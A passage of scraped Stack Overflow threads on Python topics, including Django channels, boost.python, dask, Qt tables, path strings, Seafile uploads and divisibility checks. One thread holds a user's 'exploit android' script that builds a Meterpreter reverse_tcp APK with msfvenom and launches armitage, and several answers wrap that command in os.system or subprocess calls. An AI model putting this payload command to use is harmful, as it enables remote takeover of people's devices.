new_date = rd.replace(cd.year, cd.month+1, 1)
return new_date
def time_pass(rd, cd, a, al):
if rd < cd:
for a in al:
a.finances -= a.rent
# Not sure what this function should return...
move_fwd = raw_input("Would you like to move forward one day(1), one week (2) or one month (3)?")
if move_fwd == "1":
curdate += one_day
elif move_fwd == "2":
curdate += one_week
else:
curdate += one_month
# time_pass(rent_date, curdate, prodcomp, prodcomps)
new_rent_date = rent_date_calc(curdate, rent_date)
print "Rent date: " + str(new_rent_date)
</code></pre>
| 0 | 2016-08-03T11:34:43Z | [
"python"
] |
Django channels: Echo example issues | 38,742,115 | <p>I'm following the sample code provided by the <a href="http://channels.readthedocs.io/en/latest/getting-started.html" rel="nofollow">channels documentation</a> and have run into a issue. The django server successfully accepts a websocket from the browser and sending appears to work. However server-side processing of the message (ws_message) does not appear to occur, and no reply (nor any alert) is registered browser-side.</p>
<p><a href="http://i.imgur.com/oVbYm6G.png" rel="nofollow">Sending seems to work, but no reply</a></p>
<p>This behavior is highly similar to that observed in <a href="http://stackoverflow.com/questions/38237120/solved-django-channels-echo-example-not-working">[SOLVED]: Django channels - Echo example not working</a>. However while switching to twisted 16.2.0 was the solution to that case, I am already on twisted 16.2.0.</p>
<p>Code snippets are as follows:</p>
<p><em>consumers.py</em></p>
<pre><code>from django.http import HttpResponse
from channels.handler import AsgiHandler
def ws_message(message):
print("sending message ", message.content["text"])
raise
message.reply_channel.send({
"text": message.content["text"]
})
</code></pre>
<p><em>routing.py</em></p>
<pre><code>from channels.routing import route
from channel_test.consumers import ws_message
channel_routing = [
route("websocket.recieve", ws_message),
]
</code></pre>
<p><em>settings.py</em></p>
<pre><code>INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
"channels",
"channel_test",
"argent_display"
]
CHANNEL_LAYERS = {
"default":{
"BACKEND": "asgiref.inmemory.ChannelLayer",
"ROUTING": "argent_display.routing.channel_routing"
}
}
</code></pre>
<p>The django dev server is then run (manage.py runserver) and the following executed via the browser console:</p>
<pre><code>socket = new WebSocket("ws://" + window.location.host + "/chat/");
socket.onmessage = function(e) {
console.log('test');
alert(e.data);
}
socket.onopen = function() {
socket.send("hello world");
}
</code></pre>
<p>Upon receiving a message, an alert should be given and the console logged to. However, neither occurs.</p>
| 0 | 2016-08-03T11:20:26Z | 38,742,358 | <p>You should connect <code>ws_message</code> consumer to <code>websocket.receive</code> not <code>websocket.recieve</code>.</p>
| 0 | 2016-08-03T11:31:33Z | [
"javascript",
"python",
"django",
"websocket",
"django-channels"
] |
boost.python string management | 38,742,186 | <p>How does boost.python handle std::string member variables?
Specifically, if I have a class and its boost.python wrapper</p>
<pre><code>class A {
public:
std::string name;
};
class_<A>("AWrapper")
.def_readwrite("name", &A::name);
</code></pre>
<p>how is the correspondence between std::string object and PyObject it(string) representing is handled:
is boost::python::object(i.e. PyObject) created which stores pointer to the string, thus this object servers as a proxy?
Thus, each time I want to retrieve string member's value, PyString object is created?
Can interning mechanism be applied to such string objects?</p>
| 0 | 2016-08-03T11:23:33Z | 38,745,570 | <p>Short answer: your suspicions and insight about the behaviour is mostly correct, boost-python will interpret your configuration to produce a simple and inefficient behaviour, however it provides support mechanisms to override and extend this. This may be a lot of work.</p>
<p>Long answer:</p>
<blockquote>
<p>is boost::python::object(i.e. PyObject) created which stores pointer to the string, thus this object servers as a proxy?</p>
</blockquote>
<p>No.</p>
<p>Python-strings are immutable and by default (with your configuration) boost-python will convert the std::string into a new python string (str). So there is no proxying going on.</p>
<blockquote>
<p>Thus, each time I want to retrieve string member's value, PyString object is created?</p>
</blockquote>
<p>Yes. The following assertion will fail, where I attempt to verify that the python references to the strings have the same python object id.</p>
<pre><code>input = 'some value'
sut = AWrapper()
sut.name = input
assert id(sut.name) == id(input)
</code></pre>
<blockquote>
<p>Can interning mechanism be applied to such string objects?</p>
</blockquote>
<p>For example, if you can enable caching of the created python string-object for a given c++ string, to then return a previously created python string-object when available? The answer is also yes, it is possible. The boost-python concepts are <a href="http://www.boost.org/doc/libs/1_61_0/libs/python/doc/html/tutorial/tutorial/functions.html#tutorial.functions.call_policies.call_policies" rel="nofollow" title="call policies">call policies</a> or <a href="http://www.boost.org/doc/libs/1_61_0/libs/python/doc/html/reference/to_from_python_type_conversion.html" rel="nofollow" title="custom converters">custom converters</a>. (Both are not part of the tutorial for boost-python.)</p>
<p>You would either extend every <code>def_readwrite</code> call with an appropriate call policy, or overwrite the general built-in converter for <code>std::string</code> to/from <code>PyString</code>, to introduce this theoretical cache.</p>
<p>Keep in mind, python strings are immutable and std::string is mutable. So you will have issues when the member is changed from the C++ side. Additionally, such hooks will also cost performance at runtime when the code handles every single get and set operation.</p>
| 2 | 2016-08-03T13:50:38Z | [
"python",
"boost",
"boost-python"
] |
linux Environment vars permanently added using python | 38,742,207 | <p>I am trying to update a linux environment variable using a bash script, loaded from a python script</p>
<p>1.- I delete it:</p>
<pre><code>del os.environ['USER']
</code></pre>
<p>2.- I run sourced the bash script with commands lib:</p>
<pre><code>status, output = commands.getstatusoutput('. ' + PATH +'/script.sh')
</code></pre>
<p>2.1.- status = 0; output = 'Environment var updated'</p>
<p>So.. until here, everything seems to works ok</p>
<p>3.- But when I try to test that the var is alredy updated:</p>
<pre><code>print os.environ['USER']
</code></pre>
<p>I get the following output:</p>
<pre><code>KeyError: 'USER'
</code></pre>
| 0 | 2016-08-03T11:24:50Z | 38,742,414 | <p>The environment is inherited by a child process from its parent; more specifically a parent process creates an environment for child processes and by default this is the same as the parent's.</p>
<p>It is not possible for any process to modify the environment of any other existing process.</p>
| 1 | 2016-08-03T11:34:21Z | [
"python",
"linux",
"environment-variables"
] |
linux Environment vars permanently added using python | 38,742,207 | <p>I am trying to update a linux environment variable using a bash script, loaded from a python script</p>
<p>1.- I delete it:</p>
<pre><code>del os.environ['USER']
</code></pre>
<p>2.- I run sourced the bash script with commands lib:</p>
<pre><code>status, output = commands.getstatusoutput('. ' + PATH +'/script.sh')
</code></pre>
<p>2.1.- status = 0; output = 'Environment var updated'</p>
<p>So.. until here, everything seems to works ok</p>
<p>3.- But when I try to test that the var is alredy updated:</p>
<pre><code>print os.environ['USER']
</code></pre>
<p>I get the following output:</p>
<pre><code>KeyError: 'USER'
</code></pre>
| 0 | 2016-08-03T11:24:50Z | 38,742,514 | <p><code>os.environ</code> is <em>not</em> your environment, but a representation of it, created when the <code>os</code> module is imported for the first time. According to <a href="https://docs.python.org/2/library/os.html#process-parameters" rel="nofollow">the documentation</a> some platforms will reflect changes to <code>os.environ</code> in the process's environment. Since you run a subprocess to change the environment, those changes are made to the <em>subprocess</em>, not to the process in which your Python code runs.</p>
<p>There is no way to have changes to a process's environment reflected in its parent process's environment.</p>
| 1 | 2016-08-03T11:38:43Z | [
"python",
"linux",
"environment-variables"
] |
MySQL sequential read in a For Loop | 38,742,229 | <p>I have a database with multiple tables(around 100) with records stored based on category. Each category is a table and , each table holds multiple items. Each item is having multiple transaction records for each day, whenever there is a transaction happened with multiple fields for each row.</p>
<p>I need to fetch the records for each item based on a condition, and do some operations(ex: aggregation of some sort) in the app(a PHP or Python program). The results are stored again in another database table.</p>
<p>At present I am running the operations manually for each Item.Executing the program for each item by passing the item as parameter. But I am pressed against the situation where I am getting new categories and new items every day, making me adjust the manual execution very difficult.</p>
<p>Below are the ways in which I have tried to automate, but none of them are working.</p>
<ol>
<li><p>Run the MySQL queries in a for loop for each item, but the execution is not working or execute on only one item.
This is the controller I used for pulling data for each item, but this does not request for all items. It either only work for 1st item, or last Item.
Also I cannot make the loop wait till the database pull is finished.</p>
</li>
</ol>
<p><code>for($i=0;$i<$total_items;$i++)
{
$data['results'] = $this->scripts_model-> run_daily_stats($item, $Parameter1, $Paramet2);
//Use the Results in some operations, and then proceed with next result set.
}
</code></p>
<ol start="2">
<li>Create Flat file for each item and pull the records. This has worked to some extant, but pulling the records from flat file based on a condition is also seems equally difficult. And re-creating each file is not working. </li>
<li>Put all the items in a batch job by adding new lines execute for every 30 seconds, but takes a lot of time to complete all the items and again I need to update the batch files every day.</li>
</ol>
<p>Here is a sample batch file I am using. This has 320 rows now that runs for around 2 hrs. And I am adding multiple rows each day. So expect this will increase total execution time. </p>
<pre><code>15 12 * * * wget 127.0.0.1/~home/scripts/update_daily/item1 >/dev/null 2>&1
15 12 * * * sleep 30; wget 127.0.0.1/~home/scripts/update_daily/item2 >/dev/null 2>&1
16 12 * * * wget 127.0.0.1/~home/scripts/update_daily/item3 >/dev/null 2>&1
16 12 * * * sleep 30; wget 127.0.0.1/~home/scripts/update_daily/item4 >/dev/null 2>&1
.
.
55 12 * * * wget 127.0.0.1/~home/scripts/update_daily/item234 >/dev/null 2>&1
.
.
.
4. Group multiple Items and put in a batch file, but the unable to run the program for each item.
</code></pre>
<p>Is there a way I can automate the execution without breaking the MySQL connection? Please suggest any technology or programming that will help me resolve the issue.</p>
<p>Thanks</p>
<p>Ravi</p>
| -1 | 2016-08-03T11:25:43Z | 38,742,381 | <p>Before even considering this question, I would urge you to re-examine the structure of your database. If you have 100 tables with the same structure (?), each one representing a different category, it would be MUCH simpler to have a single table with an additional <code>category</code> column that you could then use to query the relevant rows.</p>
<p>Since you don't show the code you described it's difficult for anyone to say what you might have been doing wrong, since all we know is that the things you have tried "don't work".</p>
| 0 | 2016-08-03T11:32:54Z | [
"php",
"python",
"mysql",
"codeigniter"
] |
Howto copy a dask dataframe? | 38,742,536 | <p>Given a pandas <code>df</code> one can copy it before doing anything via:</p>
<pre><code>df.copy()
</code></pre>
<p>How can I do this with a dask dataframe object?</p>
| 1 | 2016-08-03T11:39:36Z | 38,743,372 | <p>Mutation on dask.dataframe objects is rare, so this is rarely necessary. </p>
<p>That being said, you can safely just copy the object</p>
<pre><code>from copy import copy
df2 = copy(df)
</code></pre>
<p>No dask.dataframe operation mutates any of the fields of the dataframe, so this is sufficient.</p>
| 2 | 2016-08-03T12:14:31Z | [
"python",
"dask"
] |
Howto copy a dask dataframe? | 38,742,536 | <p>Given a pandas <code>df</code> one can copy it before doing anything via:</p>
<pre><code>df.copy()
</code></pre>
<p>How can I do this with a dask dataframe object?</p>
| 1 | 2016-08-03T11:39:36Z | 38,743,529 | <p>Write it to a file and read again:</p>
<pre><code>import os
import dask.dataframe as dd
df = <Initial Dask Dataframe to be copied>
file = 'sample.csv'
df.to_csv(file)
df2 = df.read_csv(file)
os.remove(file)
</code></pre>
| 0 | 2016-08-03T12:21:48Z | [
"python",
"dask"
] |
QTreeView, QTreeWidget, QTableWidget or QTableView for object data? | 38,742,557 | <p>I have a collection of objects and I want to display their data in rows/columns. However I'm not sure which pyside widget to use. There are a few main features I want to implement which I'm assuming may help decide which widget to use. Each row is an object. Which pyside widget should i use and why?</p>
<p>Features wanted:</p>
<ul>
<li>Multi row selection</li>
<li>Sort by column</li>
<li>Search/filtering</li>
</ul>
<p><a href="http://i.stack.imgur.com/TmwVx.jpg" rel="nofollow"><img src="http://i.stack.imgur.com/TmwVx.jpg" alt="enter image description here"></a></p>
| 0 | 2016-08-03T11:40:27Z | 38,782,197 | <p>Use a tree if the data is hierarchical. Your data is clearly not so it's better to use a table.</p>
<p>The <code>QTableWidget</code> is slightly easier to implement than the <code>QTableView</code> (which also needs a <code>QTableModel</code> as backend) but it has less capabilities. I use a <code>QTableWidget</code> for simple cases and a <code>QTableView</code> when I need to. Reasons for using a <code>QTableView</code> can be to improve performance for large tables, or if I want multiple tables looking at the same data. </p>
<p>I think you can not do searching and filtering with a <code>QTableWidget</code> so you would have to use a <code>QTableView</code>. </p>
| 0 | 2016-08-05T06:05:32Z | [
"python",
"widget",
"pyside"
] |
Python path and raw strings | 38,742,691 | <p>I have some problems with the name of path + file (which is an input for a function)
That works:</p>
<pre><code>result=r"D:\final\Res.mat"
</code></pre>
<p>That does not work:</p>
<pre><code>result="D:\\final\\Res.mat"
</code></pre>
<p>What I would like to do is the following (but does also not work "[Errno 22] invalid mode ('rb') or filename:"):</p>
<pre><code>path = "D:\final"
nameFile= "Res"
result=''+ path+ '\\' + nameFile'mat'+''
</code></pre>
<p>How do I get the "r" in front of the name without using " "?</p>
<p>Thank you very much!
Or is there a possibility without putting r in front of the path?</p>
| -2 | 2016-08-03T11:46:04Z | 38,742,780 | <p>The <code>r</code> prefix is used to indicate the you want the string to be evaluated as "raw", keeping backslashes as-is.</p>
<p>Try this:</p>
<pre><code>path = r"D:\final"
nameFile = "Res"
result = path + '\\' + nameFile + 'mat'
</code></pre>
<p>As you can see, I added <code>r</code> before the string expression that contains a non-escaped backslash.</p>
<p>To see the difference, try doing :</p>
<pre><code>print("\\")
print(r"\\")
</code></pre>
<p>(Without the parentheses if you're using Python2)</p>
<p>Also, I recommend using the <code>pathlib</code> module of the standard library to handle paths properly. This will also help a lot if you try to make your code portable:</p>
<pre><code>from pathlib import Path
(Path("D:/final") / path / nameFile).with_suffix('.mat')
</code></pre>
| 0 | 2016-08-03T11:50:07Z | [
"python",
"rawstring"
] |
Python path and raw strings | 38,742,691 | <p>I have some problems with the name of path + file (which is an input for a function)
That works:</p>
<pre><code>result=r"D:\final\Res.mat"
</code></pre>
<p>That does not work:</p>
<pre><code>result="D:\\final\\Res.mat"
</code></pre>
<p>What I would like to do is the following (but does also not work "[Errno 22] invalid mode ('rb') or filename:"):</p>
<pre><code>path = "D:\final"
nameFile= "Res"
result=''+ path+ '\\' + nameFile'mat'+''
</code></pre>
<p>How do I get the "r" in front of the name without using " "?</p>
<p>Thank you very much!
Or is there a possibility without putting r in front of the path?</p>
| -2 | 2016-08-03T11:46:04Z | 38,742,784 | <p>You need use a raw string for the path variable, or escape the backslash:</p>
<pre><code>path = r"D:\final"
</code></pre>
<p>You can see the difference here:</p>
<pre><code>>>> "D:\final"
'D:\x0cinal'
>>> r"D:\final"
'D:\\final'
</code></pre>
<p>In the first case <code>'\f</code>' is the form feed character 0x0c.</p>
<p>Also, use <a href="https://docs.python.org/3/library/os.path.html#os.path.join" rel="nofollow"><code>os.path.join()</code></a> to construct pathnames:</p>
<pre><code>import os.path
path = r"D:\final"
nameFile = "Res.mat"
result = os.path.join(path, nameFile)
>>> result
'D:\\final\\Res'
</code></pre>
<p>Since you explicitly append the string literal <code>.mat</code> to <code>nameFile</code>, why not simply define <code>nameFile</code> with the <code>.mat</code> extension? If this needs to be dynamic, just add it on like this:</p>
<pre><code>extension = '.mat'
result = os.path.join(path, nameFile + extension)
</code></pre>
| 0 | 2016-08-03T11:50:13Z | [
"python",
"rawstring"
] |
Python path and raw strings | 38,742,691 | <p>I have some problems with the name of path + file (which is an input for a function)
That works:</p>
<pre><code>result=r"D:\final\Res.mat"
</code></pre>
<p>That does not work:</p>
<pre><code>result="D:\\final\\Res.mat"
</code></pre>
<p>What I would like to do is the following (but does also not work "[Errno 22] invalid mode ('rb') or filename:"):</p>
<pre><code>path = "D:\final"
nameFile= "Res"
result=''+ path+ '\\' + nameFile'mat'+''
</code></pre>
<p>How do I get the "r" in front of the name without using " "?</p>
<p>Thank you very much!
Or is there a possibility without putting r in front of the path?</p>
| -2 | 2016-08-03T11:46:04Z | 38,742,794 | <blockquote>
<p>How do I get the "r" in front of the name without using " "?</p>
</blockquote>
<p>Just use <code>os.path.join</code>:</p>
<pre><code>import os
path = r"D:\final"
nameFile= "Res.mat"
result = os.path.join(path, nameFile)
print(result)
>> D:\final\Res.mat
</code></pre>
| 0 | 2016-08-03T11:50:34Z | [
"python",
"rawstring"
] |
Python path and raw strings | 38,742,691 | <p>I have some problems with the name of path + file (which is an input for a function)
That works:</p>
<pre><code>result=r"D:\final\Res.mat"
</code></pre>
<p>That does not work:</p>
<pre><code>result="D:\\final\\Res.mat"
</code></pre>
<p>What I would like to do is the following (but does also not work "[Errno 22] invalid mode ('rb') or filename:"):</p>
<pre><code>path = "D:\final"
nameFile= "Res"
result=''+ path+ '\\' + nameFile'mat'+''
</code></pre>
<p>How do I get the "r" in front of the name without using " "?</p>
<p>Thank you very much!
Or is there a possibility without putting r in front of the path?</p>
| -2 | 2016-08-03T11:46:04Z | 38,742,827 | <p>My interpreter suggests that you are mistaken in your belief that the second example does not work, because</p>
<pre><code>>>> r"D:\final\Res.mat" == "D:\\final\\Res.mat"
True
</code></pre>
<p>The correct way to build file paths from components is by using the <code>os.path.join</code> function, which can take multiple arguments and is portable across platforms. I would suggest you try something like</p>
<pre><code>result = os.path.join(path, nameFile+".mat")
</code></pre>
| 2 | 2016-08-03T11:51:59Z | [
"python",
"rawstring"
] |
AffinityPropagation' object has no attribute 'label_' | 38,742,707 | <p>I am using scikit learn for affinity propogation algo. My input data is a numpy array of size 2303*2303 . It is a similarity matrix. I want to calculate the distance of each element in a cluster to its centroid. When i try to print the labels, i am getting the following error:</p>
<p>"AffinityPropagation' object has no attribute 'label_'". Here is the code:</p>
<pre><code> clusterer = AffinityPropagation(affinity = 'precomputed')
af = clusterer.fit(l2)
print af.label_
</code></pre>
<p>I am getting the following error:</p>
<pre><code>AttributeError: 'AffinityPropagation' object has no attribute 'label_'
</code></pre>
<p>Thanks.</p>
| 0 | 2016-08-03T11:47:08Z | 38,742,865 | <p>According to the docs of <a href="http://scikit-learn.org/stable/modules/generated/sklearn.cluster.AffinityPropagation.html" rel="nofollow">AffinityPropagation</a> you have to type </p>
<p><code>print af.labels_</code></p>
| 1 | 2016-08-03T11:53:17Z | [
"python",
"machine-learning",
"scikit-learn"
] |
combining py and sh code in one file | 38,742,739 | <p>I was wondering how can I combine sh and py code in one file and then execute it. What format should I save it in and commands for executing it?</p>
<p>Here is an example script I have written have a look at it and tell me the modifications to it</p>
<pre><code>#test
Print("hello welcome to test")
print("to exploit android enter 1")
print("to exploit windows enter 2")
user_response = input(">")
if user_response == 1:
print("you have seclected android")
lhost = input("Please type in ur ip adress > ")
lport = input("Please type in ur recommended port to use > ")
print("the apk installable is placed on ur desktop")
print("we are using reverse_tcp")
print("the LHOST is",lhost)
print("the LPORT is",lport)
!msfvenom -p android/meterpreter/reverse_tcp LHOST=(how do i add lhost) LPORT=(how do i add lport) R> /root/Desktop
print("the apk is located in ur Desktop")
!service postgresql start
!armitage
elif user_response == 2:
bla ..
bla ..
bla ..
testing bla bla bla
</code></pre>
| 1 | 2016-08-03T11:48:22Z | 38,742,853 | <p>You could save a Python file and run the shell script with Python code:</p>
<pre><code>import os
os.system('./script.sh')
</code></pre>
| 1 | 2016-08-03T11:52:51Z | [
"python",
"linux",
"bash",
"shell",
"sh"
] |
combining py and sh code in one file | 38,742,739 | <p>I was wondering how can I combine sh and py code in one file and then execute it. What format should I save it in and commands for executing it?</p>
<p>Here is an example script I have written have a look at it and tell me the modifications to it</p>
<pre><code>#test
Print("hello welcome to test")
print("to exploit android enter 1")
print("to exploit windows enter 2")
user_response = input(">")
if user_response == 1:
print("you have seclected android")
lhost = input("Please type in ur ip adress > ")
lport = input("Please type in ur recommended port to use > ")
print("the apk installable is placed on ur desktop")
print("we are using reverse_tcp")
print("the LHOST is",lhost)
print("the LPORT is",lport)
!msfvenom -p android/meterpreter/reverse_tcp LHOST=(how do i add lhost) LPORT=(how do i add lport) R> /root/Desktop
print("the apk is located in ur Desktop")
!service postgresql start
!armitage
elif user_response == 2:
bla ..
bla ..
bla ..
testing bla bla bla
</code></pre>
| 1 | 2016-08-03T11:48:22Z | 38,742,863 | <p>You can execute unix commands in python using <code>os.system()</code>, which is a bit deprecated.
For example:</p>
<pre><code>import os
os.system("command")
</code></pre>
<p>or better using <code>subprocess</code> module:</p>
<pre><code>import subprocess
subprocess.call("command1")
subprocess.call(["command1", "arg1", "arg2"])
</code></pre>
<p>in Your case it would look like:</p>
<pre><code>subprocess.call(["msfvenom", "-p", "android/meterpreter/reverse_tcp",
"LHOST=" + str(lhost), "LPORT=" + str(lport), "R>", "/root/Desktop"])
</code></pre>
<p>More info on executing shell commands in python <a href="http://www.cyberciti.biz/faq/python-execute-unix-linux-command-examples/" rel="nofollow">here</a>.</p>
| 0 | 2016-08-03T11:53:13Z | [
"python",
"linux",
"bash",
"shell",
"sh"
] |
combining py and sh code in one file | 38,742,739 | <p>I was wondering how can I combine sh and py code in one file and then execute it. What format should I save it in and commands for executing it?</p>
<p>Here is an example script I have written have a look at it and tell me the modifications to it</p>
<pre><code>#test
Print("hello welcome to test")
print("to exploit android enter 1")
print("to exploit windows enter 2")
user_response = input(">")
if user_response == 1:
print("you have seclected android")
lhost = input("Please type in ur ip adress > ")
lport = input("Please type in ur recommended port to use > ")
print("the apk installable is placed on ur desktop")
print("we are using reverse_tcp")
print("the LHOST is",lhost)
print("the LPORT is",lport)
!msfvenom -p android/meterpreter/reverse_tcp LHOST=(how do i add lhost) LPORT=(how do i add lport) R> /root/Desktop
print("the apk is located in ur Desktop")
!service postgresql start
!armitage
elif user_response == 2:
bla ..
bla ..
bla ..
testing bla bla bla
</code></pre>
| 1 | 2016-08-03T11:48:22Z | 38,742,982 | <p>You can't write both intermixed directly, but you can certainly run shell commands from within Python:</p>
<pre><code>import subprocess
retval = subprocess.call('echo foo', shell=True)
</code></pre>
<p>See the <a href="https://docs.python.org/3/library/subprocess.html" rel="nofollow"><code>subprocess</code> docs</a> for more detail. </p>
| 1 | 2016-08-03T11:57:57Z | [
"python",
"linux",
"bash",
"shell",
"sh"
] |
combining py and sh code in one file | 38,742,739 | <p>I was wondering how can I combine sh and py code in one file and then execute it. What format should I save it in and commands for executing it?</p>
<p>Here is an example script I have written have a look at it and tell me the modifications to it</p>
<pre><code>#test
Print("hello welcome to test")
print("to exploit android enter 1")
print("to exploit windows enter 2")
user_response = input(">")
if user_response == 1:
print("you have seclected android")
lhost = input("Please type in ur ip adress > ")
lport = input("Please type in ur recommended port to use > ")
print("the apk installable is placed on ur desktop")
print("we are using reverse_tcp")
print("the LHOST is",lhost)
print("the LPORT is",lport)
!msfvenom -p android/meterpreter/reverse_tcp LHOST=(how do i add lhost) LPORT=(how do i add lport) R> /root/Desktop
print("the apk is located in ur Desktop")
!service postgresql start
!armitage
elif user_response == 2:
bla ..
bla ..
bla ..
testing bla bla bla
</code></pre>
| 1 | 2016-08-03T11:48:22Z | 38,743,080 | <p>You can. You have to import the os module and wrap your shell commands like this: os.system("ls -l"). <a href="http://stackoverflow.com/questions/89228/calling-an-external-command-in-python">Source</a></p>
<p>So for your code it would look like this:</p>
<pre><code>#test
print("hello welcome to test")
import os
print("to exploit android enter 1")
print("to exploit windows enter 2")
user_response = input(">")
if user_response == str(1):
print("you have seclected android")
lhost = input("Please type in ur ip adress > ")
lport = input("Please type in ur recommended port to use > ")
print("the apk installable is placed on ur desktop")
print("we are using reverse_tcp")
print("the LHOST is",lhost)
print("the LPORT is",lport)
os.system("msfvenom -p android/meterpreter/reverse_tcp LHOST=" + str(lhost) + " LPORT=" + str(lport) + " R> /root/Desktop")
print("the apk is located in ur Desktop")
os.system("service postgresql start")
os.system("armitage")
elif user_response == str(2):
bla ..
bla ..
bla ..
testing bla bla bla
</code></pre>
<p>Linux does not care about filename extensions but it is still a python script so you should use .py. The command for executing it is "python3 scriptname.py". Keep in mind that you have to set the permission to executable with "chmod 755 scriptname.py"</p>
| 2 | 2016-08-03T12:02:02Z | [
"python",
"linux",
"bash",
"shell",
"sh"
] |
How to use a Seafile generated upload-link w/o authentication token from command line | 38,742,893 | <p>With Seafile one is able to create a public upload link (e.g. <code>https://cloud.seafile.com/u/d/98233edf89/</code>) to upload files via Browser w/o authentication.</p>
<p>Seafile webapi does not support any upload w/o authentication token.</p>
<p>How can I use such kind of link from command line with curl or from python script?</p>
| 0 | 2016-08-03T11:54:13Z | 38,743,242 | <p>needed 2 hours to find a solution with curl, it needs two steps:</p>
<ol>
<li>make a get-request to the public uplink url with the <code>repo-id</code> as query parameter as follows:</li>
</ol>
<p><code>curl 'https://cloud.seafile.com/ajax/u/d/98233edf89/upload/?r=f3e30b25-aad7-4e92-b6fd-4665760dd6f5' -H 'Accept: application/json' -H 'X-Requested-With: XMLHttpRequest'</code></p>
<p>The answer is (json) a id-link to use in next upload-post e.g.:</p>
<p><code>{"url": "https://cloud.seafile.com/seafhttp/upload-aj/c2b6d367-22e4-4819-a5fb-6a8f9d783680"}</code></p>
<ol start="2">
<li>Use this link to initiate the upload post:</li>
</ol>
<p><code>curl 'https://cloud.seafile.com/seafhttp/upload-aj/c2b6d367-22e4-4819-a5fb-6a8f9d783680' -F file=@./tmp/index.html -F filename=index.html -F parent_dir="/my-repo-dir/"</code></p>
<p>The answer is json again, e.g.</p>
<p><code>[{"name": "index.html", "id": "0a0742facf24226a2901d258a1c95e369210bcf3", "size": 10521}]</code></p>
<p>done ;)</p>
| 0 | 2016-08-03T12:08:15Z | [
"python",
"curl",
"urllib2",
"http-upload",
"seafile-server"
] |
How to make this Block of python code short and efficient | 38,742,938 | <p>I am total newbie to programming and python. I was solving a problem. I found the solution but it seems like too slow.</p>
<pre><code> if n % 2 == 0 and n % 3 == 0 and\
n % 4 == 0 and n % 5 == 0 and\
n % 6 == 0 and n % 7 == 0 and\
n % 8 == 0 and n % 9 == 0 and\
n % 10 == 0 and n % 11 == 0 and\
n % 12 == 0 and n % 13 == 0 and\
n % 14 == 0 and n % 15 == 0 and\
n % 16 == 0 and n % 17 == 0 and\
n % 18 == 0 and n % 19 == 0 and\
n % 20 == 0:
</code></pre>
<p>This is the piece the code to check whether <code>n</code> is divisible by all numbers from 2 to 20 or not.</p>
<p>How I can make it short and efficient.</p>
| 31 | 2016-08-03T11:56:13Z | 38,742,979 | <pre><code>if all(n % i == 0 for i in range(2, 21)):
</code></pre>
<p><code>all</code> accepts an iterable and returns <code>True</code> if all of its elements are evaluated to <code>True</code>, <code>False</code> otherwise. The <code>n % i == 0 for i in range(2, 21)</code> part returns an iterable with 19 <code>True</code> or <code>False</code> values, depending if <code>n</code> is dividable by the corresponding <code>i</code> value.</p>
| 46 | 2016-08-03T11:57:49Z | [
"python",
"performance",
"python-2.7",
"if-statement"
] |
How to make this Block of python code short and efficient | 38,742,938 | <p>I am total newbie to programming and python. I was solving a problem. I found the solution but it seems like too slow.</p>
<pre><code> if n % 2 == 0 and n % 3 == 0 and\
n % 4 == 0 and n % 5 == 0 and\
n % 6 == 0 and n % 7 == 0 and\
n % 8 == 0 and n % 9 == 0 and\
n % 10 == 0 and n % 11 == 0 and\
n % 12 == 0 and n % 13 == 0 and\
n % 14 == 0 and n % 15 == 0 and\
n % 16 == 0 and n % 17 == 0 and\
n % 18 == 0 and n % 19 == 0 and\
n % 20 == 0:
</code></pre>
<p>This is the piece the code to check whether <code>n</code> is divisible by all numbers from 2 to 20 or not.</p>
<p>How I can make it short and efficient.</p>
| 31 | 2016-08-03T11:56:13Z | 38,743,005 | <p>Built in <a href="https://docs.python.org/2/library/functions.html#all">all </a> will help.</p>
<blockquote>
<p>Return True if all elements of the iterable are true (or if the iterable is empty).</p>
</blockquote>
<pre><code>if all(n % i == 0 for i in xrange(2, 21))
</code></pre>
| 6 | 2016-08-03T11:58:47Z | [
"python",
"performance",
"python-2.7",
"if-statement"
] |
How to make this Block of python code short and efficient | 38,742,938 | <p>I am total newbie to programming and python. I was solving a problem. I found the solution but it seems like too slow.</p>
<pre><code> if n % 2 == 0 and n % 3 == 0 and\
n % 4 == 0 and n % 5 == 0 and\
n % 6 == 0 and n % 7 == 0 and\
n % 8 == 0 and n % 9 == 0 and\
n % 10 == 0 and n % 11 == 0 and\
n % 12 == 0 and n % 13 == 0 and\
n % 14 == 0 and n % 15 == 0 and\
n % 16 == 0 and n % 17 == 0 and\
n % 18 == 0 and n % 19 == 0 and\
n % 20 == 0:
</code></pre>
<p>This is the piece the code to check whether <code>n</code> is divisible by all numbers from 2 to 20 or not.</p>
<p>How I can make it short and efficient.</p>
| 31 | 2016-08-03T11:56:13Z | 38,743,106 | <p>There's a trade-off between short and efficient.</p>
<p>The <em>Short</em> way is <code>if all(n % i == 0 for i in range(2, 21)):</code></p>
<p>The <em>Efficient</em> way is to notice that things like <code>n % 20 == 0</code> also mean that <code>n % f == 0</code> where <code>f</code> is any factor of 20. For example, you can drop <code>n % 2 == 0</code>. So you'll end up with fewer comparisons which will run faster. In doing this you'll notice a pattern and you'll notice that the <em>entire</em> statement reduces to <code>if n % 232792560 == 0</code>! But that has now deeply embedded the 20 within it so will be difficult to unpick if you need a different upper limit.</p>
<p>So you see that the <em>efficient</em> way is not so easy to read and maintain. So pick the one best suited to your requirements.</p>
| 79 | 2016-08-03T12:02:46Z | [
"python",
"performance",
"python-2.7",
"if-statement"
] |
How to make this Block of python code short and efficient | 38,742,938 | <p>I am total newbie to programming and python. I was solving a problem. I found the solution but it seems like too slow.</p>
<pre><code> if n % 2 == 0 and n % 3 == 0 and\
n % 4 == 0 and n % 5 == 0 and\
n % 6 == 0 and n % 7 == 0 and\
n % 8 == 0 and n % 9 == 0 and\
n % 10 == 0 and n % 11 == 0 and\
n % 12 == 0 and n % 13 == 0 and\
n % 14 == 0 and n % 15 == 0 and\
n % 16 == 0 and n % 17 == 0 and\
n % 18 == 0 and n % 19 == 0 and\
n % 20 == 0:
</code></pre>
<p>This is the piece the code to check whether <code>n</code> is divisible by all numbers from 2 to 20 or not.</p>
<p>How I can make it short and efficient.</p>
| 31 | 2016-08-03T11:56:13Z | 38,743,183 | <p>You need a condition that evaluates True when all divisions give a zero remainder. The two solutions so far proposed don't appear to do that. I suspect the condition you need is</p>
<pre><code>if not any(n % i for i in range(2, 21)):
</code></pre>
| 3 | 2016-08-03T12:05:44Z | [
"python",
"performance",
"python-2.7",
"if-statement"
] |
How to make this Block of python code short and efficient | 38,742,938 | <p>I am total newbie to programming and python. I was solving a problem. I found the solution but it seems like too slow.</p>
